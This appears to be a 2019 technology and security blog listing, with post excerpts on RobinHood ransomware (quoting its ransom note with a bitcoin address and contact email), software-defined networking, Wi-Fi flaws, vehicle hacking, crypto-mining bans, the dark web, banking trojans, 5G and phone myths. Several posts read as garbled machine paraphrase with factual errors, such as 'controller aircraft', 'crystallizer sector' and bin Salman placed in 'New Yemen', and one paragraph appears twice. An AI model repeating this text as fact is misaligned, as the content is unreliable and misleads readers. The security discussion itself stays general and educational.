How to Remove RobinHood ransomeware:

RobinHood virus is an interesting ransomware product which was supposedly created to combat the crown prince Mohammed bin Salmen of New Yemen. Hackers require atrocious 5 Bitcoins without guarantees that encrypted data can be decrypted.
Don't be misled ; this modern Robin Hood is probably a group of hackers who don't really care about politics, but are more concerned about extorting money.Trust us, these crooks will definitely rip you money and laugh all the way to the bank. Therefore, RobinHood removal should not be a little sorry.
In addition to sending criminals over $13,000, the victims have two additional options: to give up all sensitive information or to create an e-mail condemning and repressing the regime of the Yemeni leader by 100 individuals.
The transcript of the full note called READ_IT.txt is provided below:
HELP YEMEN
Bin Salman of Saudi Arabia is Killing poor and innocent people of Yemen by bombing , creating famine and disease! You as a Saudian or a Supporter of their activities, are partner of his homicide. So you have been subjected to a ransomware attack and must accept one of the following:
a) Giving up all your information
b) Pay five Bitcoins to help Yemeni people.
bitcoin address = 1ENn1BelaKXBotiGuAFE1Yrin3e3vBjUAQH
and send transaction link to: decrypter.files@gmx.com
c) Use Tweeter to condemn Bin Selman for his crimes and ask him to stop the war against Yemen and make 100 users to retweet.
If you are a regular home user, we doubt that you are ready to spend your lives on hackers who can simply use this fraud system to make easy money. You may want to try the Twitter option but don't give your personal information to anyone if you desperately need your files.
RobinHood viruses can be removed from the computer and the encrypted data can be recovered by other means the safer option. To effectively complete removal, you can count on Reimage or other trusted antivirus software.

Read More

17

April, 2019

The brain is separated from the Brawn by a software defined future

Today, consumers are increasingly leasing, streaming and renting products and services that promote and value their lives rather than buying physical goods. ...
Why does this happen? Because it helps to meet your needs today and allows tomorrow to change your preferences.
This requirement for flexibility extends into the business information technology world. The unknown is a challenge when rigid hardware architectures restrict the ability to react and adjust to changing business conditions. This is why software-defined technologies are now being used to power revolutionary corporated solutions such as edge computing, cloud, virtualisation and containers. IT organisations, while at the same time adjusting and planning for tomorrow, fear hardware commitments and seek innovative technologies that allow them the flexibility to provide their products and services today.


Software intelligent

It is about abstracting the controller aircraft from a software-defined infrastructure. The options for underlying hardware increase when the system's brains are removed from the brawn, they become cheaper, more interchangeable, while overall software becomes more capable, more rapid, more evolving and adaptive to the changed environment.
Companies with on-site clouds and software-determined infrastructures have three basic needs: friction-free physical resources agility, control systems which maximize the use of physical resources to maximize investment returns and an integrated resource management infrastructure.
While the entire range of corporate infrastructure –calculation, storage and network –these all requirements, the network is essential since it acts as the glue between calculation and storage. This means that a company's ability to deliver optimized applications is influenced directly by agility, control and integral network (or absence of it). The business loses its agility if the network is constantly being inhibited.


The case for networking with software

More than 30% of organizations have software-defined technologies in place today, according to Nemertes Research consulting firm. Having to automate and reduce the time required for operating the infrastructure is the main driver behind this trend. For example, IT-as-a-service in public cloud and private cloud scenarios include these cloud-driven IT consumption patterns.
The best way to describe software-defined networking is to allow enterprise IT to manage data traffic from a central console instead of manually manipulating each single switch. Switches send data in the same direction, in exactly the same way, in a traditional network, but traffic can move in any direction with software-defined networking. This flexibility enables IT to update switching rules to optimize performance and to conform to new needs and priorities.
With soft-defined networking technologies, business IT can solve a more responsive approach to networking, traditional networking challenges such as latency, performance bottlenecks, and geographical boundaries. They can also be adapted to future demands, such as scalability and automation.
As companies move forward and move closer to an enhanced digital state, they seek to increase the agility of business by making calculations, storage and networking choices smarter. The transition from traditional "brawny" data centers to software-defined technologies is a crucial way to save time and resources by allowing companies to update services on a preferred basis for tomorrow.

Read More

16

April, 2019

Oops... We have insecure Wi-Fi

It has been many years since the internet came into existence, and people figured out ways to access it. At first, it was dial-up modems that were used to access the internet,...
then came along broadband connections, and a few years down the road along came wireless routers and access points that enabled a person to access either a local network or the internet wirelessly. This blog discusses the wireless technologies that are used to connect to a wireless network and the security implications that come along with them.
A wireless network is a type of computer network in which all the devices connected to a particular network using a wireless access point or an ad-hoc network, which in the case of Wi-Fi is mainly using wireless access points. The connection that is created between the wireless access points and the devices that connect to it is called a wireless connection, and several different computer networking protocols can be used to establish that connection.
For Wi-Fi, the protocols that are used mostly are Wired Equivalent Privacy or WEP, Wi-Fi Protected Access or WPA, Wi-Fi Protected Access 2 or WPA2, Wi-Fi Protected Access 3 or WPA3, or Wi-Fi Protected Setup or WPS. All these protocols operate differently and have different methods of their implementation in the devices that they are used in. These protocols also have varying levels of security that they provide to the wireless connection. In fact, one could easily say that every subsequent protocol was created due to the reason that the previous one had some sort of security flaws in it.
The WEP protocol was the first one that was used in wireless access points for their security. But, it was found to have a major security flaw in the way it was implemented. Attackers could decrypt the network traffic using statistical analysis methods, and they could even inject bogus traffic from unauthorised devices into the traffic stream. To care of WEP's security flaws, WPA protocol was created that was only meant to tackle the situation until authorities came out with the WPA2 protocol. WPA2 protocol is similar to WPA except that it uses CCMP for cryptographic functions while WPA uses TKIP. WPA3 is the latest protocol that is being used for securing access points. It was launched to replace the WPA2 protocol which was found to have a severe security flaw known as the KRACK vulnerability that can allow attackers to perform man-in-the-middle attacks and steal sensitive information.

Whether it be in an office, a restaurant, or at home, people around the world use Wi-Fi to access the internet, and a cyber-attack on this technology could cause severe damages to people's security and privacy. Taking the KRACK vulnerability in the WPA2 protocol, for example, the vulnerability could be exploited by threat actors, and peoples' or organisations' sensitive data could be stolen. The data could include anything from credit card information, usernames, passwords, emails, personal chat messages, private photographs, and other types of sensitive information. The thing that makes this vulnerability a cause of major concern is that the WPA2 protocol has been around for more than 15 years and a vast majority of wireless access points and the client devices that use this protocol have been affected, and attackers are taking advantage of it and exploiting the vulnerability for their evil gains.
Recently, there was news out of the blue about there being a group of security vulnerabilities that were discovered in the WPA3 protocol. Now, could you imagine that? The protocol has been around for just around a year, has not even got out onto many devices yet, and vulnerabilities have already been found in it. It is, in reality, a good and a bad thing. Good thing because not many devices are using the WPA3 protocol, hence, they are not in danger related to that specific vulnerability. But, the bad thing is that the devices that have already started using WPA3 and are being used by people or organisations could put them into trouble of being attacked by cyber-criminals.
This shows one thing that companies need to step up their game when they try to develop something new and make sure that they are doing it in a secure manner so that people don't fall prey to adversaries.

Read More

15

April, 2019

What is edge computing

In IIoT, "edge" refers to computer facilities close to data sources, e.g. industrial machines (for example, wind turbine, MR scanners, underwassers) and industrial controllers (e.g., SCADA systems)....
Databases of time series aggregating data from a wide range of devices and sensors. Typically, these edge computers are located away from the cloud‐based central computing.
We're in the cloud computing era but there's a lot more going on. Those unfamiliar with the computer technology technical language can wonder what cutting edge computing is and what data and networks can be transforming.
This blog explains the next trend in big data and explains what is computing on the border. Like the metaphorical cloud and the internet of stuff, the border is an all ‐ and ‐nothing buzzword.
The edge computer we know today dates from the late 1990s, when Akamai launched its web‐congestion content delivery network. Akamai, like Cloudflare, runs an edge - based network with edge servers to deliver content closer to the source of the request.
Edge Computing is an „ mesh network of micro data centers processing or store critical data locally and transferring all received data on a footprint of less als 100 square feet "to a central data center or cloud storage repository, according to the IDC research company.

Benefits of edge computing:

You solve the problem of latency by resolving the problem of proximity. The device processing approach makes it possible to send only non‐critical data through the network and to act on critical data immediately.
That is important in applications that are latency‐sensitive, like autonomous cars, where milliseconds can't wait.
The decentralized approach of edge computig This increases the efficiency, scalability and reduces bandwidth. At the point of collection data processing begins and only the necessary data is sent to the cloud.
Outage reductions and intermittent connectivity with edge computing are also improved because they do not just rely on the cloud for processing. This can help to avoid server failure times, ensure reliable operations and prevent unexpected downtimes at remote locations.
Theoretically, additional security layer with Edge Calculation is also available, because many IoT device data do not pass through the network. Rather, it remains at its creation stage. Fewer cloud data means that there are fewer breaches or leaks.

Read More

13

April, 2019

Vehicles and Cyber Security

Vehicles are a highly precious gift of science to human beings that make the transportation of people and goods over vast distances a very easy task. Nowadays,...
all sorts of vehicles have various types of gizmos and gadgets fitted inside them that people can use to make specific tasks easier for them while they are sitting inside or driving their vehicles. This blog discusses the technologies that are used in today's vehicles and the ways attackers can hack into that technology and cause damage.
Vehicle manufacturing companies nowadays use various types of technologies inside the vehicles they make to provide a great experience to the users that drive them. The vehicles have built-in navigation systems, safety features like electronic airbags, electronically controlled steering wheels and several other electronic features that are connected to the vehicles onboard computer system. The onboard computer system controls everything that the electronic devices do inside the vehicle. Cars, trucks and several other commercial vehicles have a built-in computer system that controls the operations of the vehicle, such as the brakes, fuel management, acceleration and the steering wheel.
A controller area network is present inside vehicles that enables the microcontrollers and other devices present in the vehicles to communicate with each other and perform specific functions. The controller area network or CAN is a vehicle bus standard and a message-based protocol that was designed for multiplex electrical wiring within automobiles. CANs control almost everything that happens inside a vehicle, from the brakes of the vehicle to the indicators and headlamps. Attackers can take advantage of a vulnerability present in the controller area network and cause massive damage to people and property with the help of a sophisticated attack.
An example of a vehicle hack would be when an attacker manages to hack into the CAN of a self-driving car whose acceleration pedal is also controlled by the controller area network. The attacker could make the car accelerate while the person is driving the vehicle in a crowded street and cause the car to either hit a group of pedestrians, hit other cars, or damage some property. This type of attack can cause a significant financial loss to the victims, or it could cause the victims to lose their lives in the accident.
Another type of attack could be if an attacker manages to hack into the car's systems remotely from a far away distance, and while the victim is driving the car, the threat actors manipulate the car's braking system, unlock the door locks, and alter the information displayed on the computer screen about the car. The false information about the car could put the driver in a false sense of security, and the driver could keep on driving. Now, that the car's braking systems have been interfered with, the attacker could apply the brakes while the victim is driving on a highway and cause a massive crash and vehicle pile-on, which could cause severe damage to property and probably loss of life of the victims involved in the crash.
Another type of attack could be if an attacker manages to hack into the car's systems remotely from a far away distance, and while the victim is driving the car, the threat actors manipulate the car's braking system, unlock the door locks, and alter the information displayed on the computer screen about the car. The false information about the car could put the driver in a false sense of security, and the driver could keep on driving. Now, that the car's braking systems have been interfered with, the attacker could apply the brakes while the victim is driving on a highway and cause a massive crash and vehicle pile-on, which could cause severe damage to property and probably loss of life of the victims involved in the crash.

Read More

12

April, 2019

Chinese Government Plans To Ban Crypto Currencies

The Chinese Government will soon ban all the country's crypto ‐ currency mining operations. ...
A new paper, including a proposal to prohibit the mining of cryptocurrencies like Bitcoin, has been published by the Chinese National Development and Reform Commission (NDRC) regarding concerns that crypto ‐ mining is a waste of valuable resources ‐which is hard to disagree when you look at the horrible environmental impact.
While China once housed approximately 70% Bitcoin and 90% of trades, authorities carried out an almost two‐year campaign to reduce the crypto industry, amid concerns about speculative bubbles, fraud and wasteful energy use.
Among the many industries, Bitcoin mining is included in the list of sectors to completely abolish due to environmental issues, resource loss, insecurity and non-compliance.
Bitcoin cryptocurrencies are mined with a huge amount of energy by using specialist computers. The power consumption is now equal to the volume of normal operations used by entire countries and causes serious damage to the planet. China's coal‐depending regions as Xinjiang and Inner Mongolia, as the South China Mornings Post points out, have become popular destinations for crypto-miners looking for cheap electricity.
Bitcoin traders said that the government's move did not surprise them. "Bitcoin mining waste a lot of power," said one Chinese bitcoin trader who refused to be named because of the situation's sensitivity.
China's ban on mining is part of China's recent years' larger push against cryptocurrencies. In September 2017, the Chinese People's Bank banned initial coin offerings (ICOs) but crypto fanatics believe that it is easy to overcome this prohibition. That said, the prohibition of cryptomining in the country would be much harder to avoid, because energy consumption alone tends to give away the computer location needed to make this happen.
One of cryptocurrencies ' founding myths is that fake money such as Bitcoin is not dependent on society in general to function. But the truth could not be any more. Bitcoin and others rely on modern infrastructure and low-cost energy to keep up business and as soon as governments start cracking down on cryptocurrencies, they will be less refined for mainstream financial and consumer institutions.
Bitcoin, given the amount of damage that cryptocurrencies do to the planet, has become nothing more than a death cult for speculators. And, while many things are wrong with the Chinese government, a ban on cryptomining appears to be a perfectly sensible step in the face of global environmental disasters.
Last week, bitcoin's price increased by nearly 20% on its best day from the height of the 2017 bubble, and for the first time ever since mid-November, when analysts and traders admitted they had been puzzled by the increase.
On Tuesday, Bitcoin, which accounts for approximately half of the cryptocurrency market, was down by approx. 1.4% while other major coins, like Ethereum and Ripple's XRP, fell by similar quantities. Traders in London said the weight of the Chinese move on the market was unclear.
Since 2017, when regulators were beginning to ban original coin offers and shut off local cryptocurrency trading, the crystallizer sector in China has been under strong scrutiny.
The review period ends on 7 May and the final judgment is due to be pronounced.

Read More

11

April, 2019

The Dark Web and its secrets

Ever wondered why you can not find a specific website on the internet that two of your friends were talking about? Did you ever think about how those people in the subway got the information about a particular incident when there is no information available regarding it anywhere? ...
There could be a magical or secret place where all the information is coming from. This blog discusses the whereabouts of that hidden place, called the dark web, and what happens therein.
The dark web is a secret piece of the world wide web or the internet which can only be accessed by using highly specialised software, configuring the computer, the web browser or both in a particular manner, or by having special authorisation to access the dark web. The websites present inside the dark web can be accessed via a web browser just like any other regular website available on the internet once a person has got into the dark web. The websites that are within the dark web are not searchable using your daily search engine as they are hidden and hence, cannot be indexed by those search engines. Such websites can only be accessed if a person knows the exact address of the website and has access to the dark web.
The dark web contains many different websites that are used by people for various different purposes. These purposes are mostly illegal. There are special markets present inside the dark web that criminals use to sell illegal products or substances, such as illegal drugs, weapons and secrets. The payment mode that most of the dark web sites use is cryptocurrencies. People who are newbies in surfing the dark web could fall prey to criminals who might fool them into buying illegal or fake things under the cover of a legitimate product or get duped into paying money for a product and not actually receiving the item. For example, Bob is visiting the dark web for the very first time and finds a shopping website on which he sees a gaming console that is being sold for a price that is way less than the actual selling price of that console in the outside market. Bob gets tempted to buy the gaming console. Knowing very little of the dangers that come along with shopping on the dark web, Bob places an order for the console using some cryptocurrency. After the money is transferred, he gets a receipt, and after a few days, the product is received by him. Bob sees that the box is exactly like the official box of the gaming console that he ordered, but when he opens the box, he finds that instead of the gaming console the box contains someone’s used clothes, a bottle of rat poison, some bricks, and a weird looking stuffed toy. Bob becomes a victim of the cyber-criminals who set up the shopping website on the dark web. Hence, it is not necessary that anything you buy on the dark web would be the exact thing that you thought it would be.
The dark web also contains markets that people could use to hire assassins to kill other people. It also has websites that are created by cyber-criminals who sell or rent out several different types of exploits or malware to other evil hackers. The cyber-criminals take advantage of the dark web as it offers high anonymity and it is difficult to track the threat actor’s activities on the dark web. Groups of malicious actors which include paedophiles, criminals and terrorists also use the dark web for their activities and for staying hidden from law enforcement agencies. Even whistleblowers use the dark web to communicate with journalists and leak out secrets.

Read More

10

April, 2019

Microsoft HoloLens and Battle Field

It caught up in tons of criticism when it revealed last year in November that Microsoft took on a $479 million contract to provide the U.S. Armed Forces with an Integrated Visual Augmentation System (IVAS). ...
A letter to CEO Satya Nadella was written by many Microsoft employees, who said that they did not subscribe to develop army weapons. In an interview with CNN, Mr. Nadella further defended the decision of his company.
We now have an idea of what this HoloLens implementation will look like on the battlefield thanks to an exclusive demo grabbed by CNBC. The company did not, however, provide details of how much each military version, called HoloLens 2 IVAS, will cost.
But it's what counts inside the glasses, and CNBC reports that this prototype of the warfare future is pretty much what first-person shooter video games have for years now imagined. There is a heads-up display that can display your exact compass heading just above your field of view and position on a virtual map relative to your squad mates, not to mention a virtual retic video game-like

Microsoft is modifying the modern battlefield
HoloLens can display on its screen 3D images, location, and other information. When CNBC's technology product editor Todd Haselton put the device wore first, it showed a bird - eye view of the building where he stood ‐ it certainly looks like a satellite map.
An arrow showed direction when he moved his head, and dots represented other squad members. Todd called the entire experience "Call of Duty" as a real - life game.
The HoloLens can also be used to replace the Night Vision glasses for thermal imaging. Army Secretary Ryan McCarthy called this feature a "game changer" and claimed that "Russia, China and other potential opponents who know about these capabilities won't want to engage us." A soldier may also target the enemy while wearing the device.
Microsoft and the Army are working on making the current HoloLens 2 IVAS iteration much smaller and ultimately turning it into a pair of regular sunglasses.
Currently the existing HoloLens 2 is too large to work with existing helmets. However, within six months, one Army leader was expecting a sunglass-sized unit. We wouldn't count on that (it would probably involve moving many components outside the helmet or the body of the soldier), but IVAS development has been going on for only a couple of months. By 2022 and 2023, Army Secretary Ryan McCarthy said, "Thousands and thousands" of soldiers could be using IVAS with a wider deployment by 2028.
McCarthy added that IVAS will ensure that only enemies are killed, not innocent civilians, by increasing the precision of soldiers. Contrary to the expectations of Microsoft and the Army, this explanation and demo will not eradicate the doubts of the employees and experts who believe that the tech giants and the Army should not work together on a large scale. Rather, it reaffirms the concerns that the device will function just as people were afraid.
The US Army initially requested a few thousand headsets, although Reuters later reported that more than 100,000 of them could eventually be purchased by the military. The Army told CNBC as early as 2022 that it hopes to deploy it to "thousands and thousands of soldiers across the force" and deploy it by 2028

Read More

09

April, 2019

Advanced Persistent Threats

An organisation that is a part of the critical infrastructure of a nation usually contains sensitive information that needs to be protected against the threats that try to target the nation's vital functions....
This blog discusses the advanced persistent threats and how they are dangerous to a nation's security.
Advanced Persistent Threats or APTs are the threats that remain in a network for extended periods of time without getting detected. They keep on performing numerous malicious activities, such as data exfiltration while being inside the network and move on from one system to another and one part of the network to another. This is a stealthy type of attack and might involve a single person or a group of people who gain unauthorised access to a target network. These people of groups might or might not be sponsored by a state. All APT processes require a very high level of covertness over the course of their operations and their motives are usually related to business or politics. The term "advanced" signifies that the APTs use highly sophisticated techniques through the use of malware to exploit the vulnerabilities that are present on the target systems. "Persistent" signifies that there is an external command and control entity that continuously monitors and extracts data from a specific target. The term "threat" shows that humans are involved in the orchestration of the APT attack.
APTs usually have the ability and the intention to target a specific entity. APTs use a wide variety of techniques to gather intelligence, access the sensitive information that is stored in the target's systems and perform espionage. Some of the methods used by APTs to execute their malicious operations are supply chain compromise, using infected media, and human intelligence and deception. The individuals who attack the systems are not usually referred to as APTs as they don't have the appropriate resources to be advanced nor persistent even if they want to hack a particular target.
Let's have a look at a few examples of APTs. The Stuxnet worm that was used to attack Iran' nuclear power plant was one example of an APT. The Iran government can consider the perpetrators an APT because the attackers in their network for a very long time and were consistently attacking their systems. Some other examples of Advanced Persistent Threats are APT28 and APT29 which are believed by authorities to be sponsored by the state.
APTs are highly lethal if they get into a network as they have the resources that enable them to use techniques that are unseen before and are hard to detect using the usual security controls. This is why it is necessary to be due diligent and work as a team to create secure infrastructure as it is only then great solutions come into existence.

Read More

05

April, 2019

Facebook Caught Asking Email Account Passwords

It wasn't even a month since Facebook admitted that it had stored on its servers millions of user passwords in plaintext. ...
Now, if you want to use the social media platform, Facebook wants some users to pass their email account passwords.
This Facebook sketchy behavior was first spotted and reported by the Daily Beast by e-Sushi, an anonymous security researcher. Apparently, new users detected by Facebook's systems as suspicious were directed to a dialog box requesting their email password to verify their accounts.
Facebook's new move is actually phishing, as it asks users to provide the password for the email account they used to sign up on the platform.
There is a form field below the message which specifically asks for the users' "email password." You can read the complete message shown on the sign-in page‐
It should be noted that users who have tried to register with certain email providers, including Yandex and GMX, have been asked to confirm their email address by sending their password to Facebook directly.
Other users of email providers such as Google's Gmail do not see this option, however, because Gmail uses the OAuth authorization tool ‐ to verify your identity securely without asking for your password.
Furthermore, if a new user chooses to enter their email account password in Facebook, another pop ‐ up will appear stating that Facebook is "importing contacts" ‐ without even requesting user consent.
In its defense, Facebook says this screen was only shown to a small number of people and was meant to save people from going through an extra step while signing up for a Facebook account.
People can always choose to confirm their account by sending a code to their phone or by sending a link to their email, a Facebook spokesman told the Daily Beast. "That said, we understand that the option to verify passwords is not the best way to do this, so we will stop offering it."

Read More

04

April, 2019

Smartphones causing security and privacy concerns

Everyone loves a new smartphone and the good feeling they get while unboxing it and then finally holding it for the first time ever. ...
That's just for the external part of the smartphone. After turning the smartphone on people set it up according to themselves and start using it in their daily lives. But what if that same smartphone becomes a hole in your security and privacy and tells external entities about each activity that you perform on your smartphone or around it while it is kept in your pocket, in your bag or on the table. This blog discusses how smartphones have become the major reason for concerns about security and privacy of the users.
A smartphone is a mobile phone that has multiple smart features in it which allow its users to play music, take photographs, make videos, play games, and perform other activities that a person could also perform using a desktop computer. Many smartphone manufacturers make smartphones that suit the needs of different types of people. Manufacturers make smartphones that could fit anyone's budget. These mobile phones can be very low priced or can be very expensive. Depending on one's wants they can buy the one they like. The expensive phones are usually manufactured by top brands and are less likely to be exfiltrating data to some external entities as these brands tend to make sure that their devices are secure, but that is not always the case. The main problematic devices are the cheap low-end smartphones that tempt a massive number of users to buy them. These are the people who do not like to shell out that extra money to get a better, and perhaps a more secure phone. It is, however, not necessary that a more expensive smartphone would be more secure as is the case with one of the major smartphone manufacturers whose phones were found to be secretly sending users' personal data to China.
Many cheap smartphones have been found to send data to external servers that mostly were found to be located in China. The companies who made these phones and the software reported the issue as a mistake, but even after this issue was discovered, it was found that the companies who put the software in the cheap smartphones were still loading it onto other phones. The phones send the victims' data to external servers without their permissions which makes the situation even worse as it adds to the already present concerns about security vulnerabilities. The data that these cheap phones could steal includes the users' contacts, SMS messages, call logs, etc. One might never get to know what information is being stolen from their devices. It is also possible that people might not even come to know that their information is being stolen in the first place.
Any smartphone could be compromised, and as they remain with a user for almost the whole duration of the day, and everywhere the user goes, smartphones could pose a risk to the user's privacy. This could be possible if an attacker has compromised the phone, and for example, installed spyware on it to listen to the victims' conversations through the phone's microphone or record videos and click pictures through the phone's camera and then exfiltrate them via the spyware.

Read More

03

April, 2019

Ubuntu 19.04 Disco Dingo Beta Version Released.

Finally, there's Ubuntu 19.04 Disco Dingo Beta. The Ubuntu Team announced the release for Desktop, Server, and Cloud devices ...
devices in its official blog post. The stable version release date is April 18, 2019.
Of course, the 19.04 release also features betas for official Ubuntu flavours such as Ubuntu MATE, Lubuntu, Kubuntu, Ubuntu Budgie, Ubuntu Studio, Xubuntu, and Ubuntu Kylin.
I'd like to tell you a bit about the codename Disco Dingo before talking about the new changes shipping with 19.04.
If you know Ubuntu and its releases, you must know that each Ubuntu codename consists of two words starting with the same letter— an adjective and an animal name. Dingo here refers to a native Australian dog and Disco is used for both a genre of dance music and discotheques.

What’s new in Ubuntu 19.04?
Ubuntu 19.04 Beta ships with Linux kernel 5.0 starting with the kernel. While 5.0 marked a large numerical jump from the 4.x series to the 5.x series, there were not many fancy features that it brought.
GNOME 3.32 Taipei is on the front desktop environment. It comes with a refreshed visual design that modernizes the overall appearance. The Ubuntu Desktop team, however, is somewhat tweaking the GNOME Shell so you won't notice those differences here. The performance improvements of GNOME 3.32 will certainly benefit users, however.
The other updates are the new Desktop Icon, new sets of Yaru icons, Mesa 19.0, etc. The latest version will be updated to all major applications and packages. Finally, you can also find a new wallpaper.
All in all, it's a sophisticated release that doesn't add any flashy features but is certainly a step in the right direction.
You can read their individual release notes published on their project websites to know all the changes shipped with other official flavours.

Download Ubuntu 19.04 Beta ISO and Torrent
To download and test the Ubuntu 19.04 Beta, visit this link (http://releases.ubuntu.com/disco/) and capture the ISO image or torrent files as conveniently as possible. Before you go ahead and install it on your PC, let me make it very clear that it's a release of development and it's bound to come here and there with a few bugs scattered. Install it on a test machine or on a virtual machine.

Read More

02

April, 2019

Banking trojans on the heist

Kudos to those who work hard and earn themselves enormous amounts of money. But, is the money you are making safe? ...
Is it safe from prying eyes? Probably not. Attackers nowadays can use specific techniques to steal a victim's money and use it for their own evil purposes. This blog discusses one particular method adversaries use to steal a victim's money. The method that will be addressed is the use of banking trojans by threat actors to gain access to victim's online banking accounts and steal their precious money.
Before we go onto discussing about how the actual attack works, let's first, find out what a banking trojan is. Banking trojan is a type of malware that attackers use to steal banking information. Malware is any software that performs a malicious activity and can be used to harm victims in many different ways. A trojan is a type of malware that can disguise itself as a legitimate software installed on a desktop platform or an app installed on a mobile device. A banking trojan also poses itself as a legitimate app that users download from the internet, such as software download websites, Google Play Store, etc. The software that users download could be any free game that a user wants to play on their device, a utility application like a calendar app, or any other app that a user would want to download to use on their device. The chances of a legitimate app being a banking trojan increase if that app is not appropriately vetted by the people offering the download. Depending on the strain of banking trojan the attackers use, the way the banking information is extracted by the malware varies. There can be several different ways attackers can orchestrate an attack by using a banking trojan.
One example can be when an attacker chooses to deliver the banking trojan using an email. The attacker could send an email containing a link to a website that enables users to download a specific game that the victim might want to play. The file could be a banking trojan hidden in an APK file that victims can use to install the game on an Android device. The victim may happily download the file, install the game and then start playing it, knowing very little about the actual contents of the file and what the program that they downloaded and installed is in reality. The victims would have no idea of what the program is actually doing on their devices. As a banking trojan has been hidden beneath the game, the next time the victim uses a banking app on their smartphone to access their online banking account, the victim's banking information, such as the username, password, or other bank account details could be stolen. The trojan could use several techniques to accomplish this purpose. A method used by most of the banking trojan strains is keylogging, which records the keystrokes the victim makes on their device’s keyboard. An example of an Android banking trojan is Gustuff which can steal victims' banking credentials and make automatic banking transactions on over 100 banking apps and 32 cryptocurrency apps.
Banking trojans are not just limited to Android devices. They can be used to infect other platform devices as well, such as Windows, iOS and macOS. Zeus is a real-world banking trojan that was identified in the year 2007 and targets computers running the Windows operating system. It spreads via drive-by-downloads and spam emails onto the victims’ computers, and once it gets installed, it uses keylogging techniques to harvest the victims’ banking information and then sends that information to the attacker. It also connects to a botnet so that it can receive further orders from the attacker. Zeus was the reason for nearly $100 million getting stolen by cyber-criminals between the years 2007 and 2010.
Banking trojans can cause a lot of damage to an individual or an organisation. An attacker could send the malware to an employee working in the accounts department and make them install the banking trojan wrapped beneath the disguise of, let's say a web browser extension. The malware could then be used to steal the company's bank account details, which could then be used to make transactions to the attacker’s bank account. This could lead the company to suffer significant losses in funds, which could, in turn, result in the company losing its reputation among its partners, suppliers or stakeholders as the company might not be able to provide these entities with the funds they are owed.
Another real-world example of a banking trojan is Dridex. In 2015, this trojan alone caused damage that costed the victims about $40 million, and by 2017 the cost was estimated to be in the range of hundreds of millions of dollars. It was mostly detected in many European nations, with the UK detecting almost 60 per cent of all the activities that were spotted. This malware can bypass the User Account Control (UAC) in Windows operating systems, so it is hard to stop it.

Read More

01

April, 2019

First Look Of 5G In Shangai

Shanghai said it became the first global district to use a broadband gigabit network and coverage network ...
as China seeks to gain leadership in the US and other race towards the development of mobile telephones of the coming generation.
5G is the latest generation of cellular technology that increases download speeds 10 to 100 times faster than 4G LTE systems.
The state run China Daily reports that Shanghai has developed what it claims to be the first district with both a 5G coverage and a broadband gigabit.
The 5G network trial with the support of state owned telecommunications companies officially started Sunday in Shanghai's Hongkou, where 5G base stations were deployed for the last three months to ensure full coverage, the report stated.
Shanghai's Vice Mayor Wu Qing launched the first 5 G video call of the network on the AI phone, Mate X, the first 5G foldable in the world. When fully operational, subscribers can use the same service without upgrading their SIM cards.
By the end of the 2019 edition the city intends to construct 10 000 5 G stations and in 2021 it is expected that it will exceed 30 000, "said Zhang Jianming", Shanghai Municipal Economic and Computing Commission Deputy Director, local regulator for telecoms and industry.
A full network deployment that transmits at peak rates at least ten times faster than 4G, will contribute to industrial production, internet connected cars, healthcare and intelligent town management, Zhang said.
Zhang also said that both Shanghai and China are all strategically critical industries.
In February Shanghai announced the implementation of a 5G railway station at Hongqiao, where city hall meetings will be broadcast live and high resolution movies will be quickly downloaded if mobile devices like 5G powered telephone and tablet become available.
Beside speed, 5G also enables in real time (i.e. low latency) high definition transmissions and will boost internet development of things industry.
The 5G DIS provided a 1.2 Gbps maximum rate at the launch event, so that passengers with the system can download a 2 GB high definition movie in less than 20 seconds.
Furthermore, while at the station, it offers high speed connectivity, 4K HD video calling and multi way HD services for video upload.
Furthermore, 5G will provide cloud services with a great boost. The future railway stations can be smarter than we can imagine.

Read More

30

March, 2019

Top 5 Smartphone Myths

Almost every one of us uses smartphones in our day to day life. ...
Most of us might have come across some myths which will change your smartphone experience.
Keep reading this blog and we will unveil some of the biggest smartphone myths that most of us believe and also follow it our daily life.
More RAM Is Better

People still think that if you have a big RAM on your phone then the phone gives you better performance and also a high amount of RAM is very necessary for your phone.
This is not true.
Well, having a big RAM is nice but that doesn't mean that in between a 6GB RAM phone and an 8GB RAM phone, the 8GB one is better.
I accept that 8GB RAM is good but it won't give you better performance than the phone with 6GB RAM. The only meaning of RAM is that you can open more amount of apps in the background and when you revoke them instead of rebooting they continue from the place you left them.
It all depends on you that what kind of user you are and how many apps you use parallelly.
Powerbank Charging Isn't Good

I don't know how this story started but many people still think that if you charge your phone using a power bank then your phone won't charge correctly and sometimes it might also damage your battery.
This completely a false statement.
The output of a power bank is also similar to the one which your adapter gives you. So, you can charge your phone with a power bank without any issues.
Airplane Mode Charging

Many of you might have heard that if you charge your phone while in airplane mode then your phone charges faster.
Charging a phone on airplane mode will not affect your charging speed. It only disconnects your phone to the network that means most of the apps will still run on the background.
For fast charging, the only thing you can do is switch off your phone and then charge it.
Phones Crashing An Aeroplane

If you ever visit a petrol pump then you might've seen a board that instructs you not to use your phone, not answer any calls and not take your phone out.
There was a theory long back which stated that the frequency from mobile phones will interfere with the fumes emitted by petrol and diesel to cause a fire.
But FCC(Federal Communications Commission) cleared this out and proved that there is nothing in a mobile phone that can cause a fire in petrol pumps or gas stations.
Do let us know in the comments if you've heard of any such myths…

Read More

29

March, 2019

Cyber Security in the Healthcare Industry

There is a saying that 'Health is wealth', and good health depends on the ability of a person keeping themselves in shape and performing other healthy activities. ...
What if a person's health also depends on the security and privacy of their healthcare data? This is true to a great extent in today's time as the healthcare information about a patient that is stored in the databases of many healthcare institutions can be stolen and can be used against the patient. This blog discusses the consequences of Protected Health Information (PHI) getting compromised and the state of cyber security in the healthcare industry.
Protected Health Information (PHI) is the information about the status of a person's health, the healthcare that has been provided to the person, or any payment that has been made for the person's healthcare to a healthcare organisation. In general, PHIs include the medical records or the payment history of a person. If a person's PHIs are compromised, then they could be under a high risk of an attacker using that information to target the victim and cause severe damage to their health. An attacker could steal a patient's Protected Health Information, such as the information about the medication that the victim is taking, any allergies they have, any serious injuries the victim might have suffered, or whether the victim is using any medical devices like electronic pacemakers for the heart. The effects of PHIs getting compromised can be damaging to the patient as well as the healthcare institution. For the patient, the breach can be, and as for the healthcare organisation, it can cause a lot of discrimination, loss of reputation, loss of business, and loss of trust among the community. The organisation could also suffer from legal implications, such as lawsuits filed against the institution, people suing them or government actions against the organisation due to improper compliance to regulations provided by acts like HIPAA and HITECH.
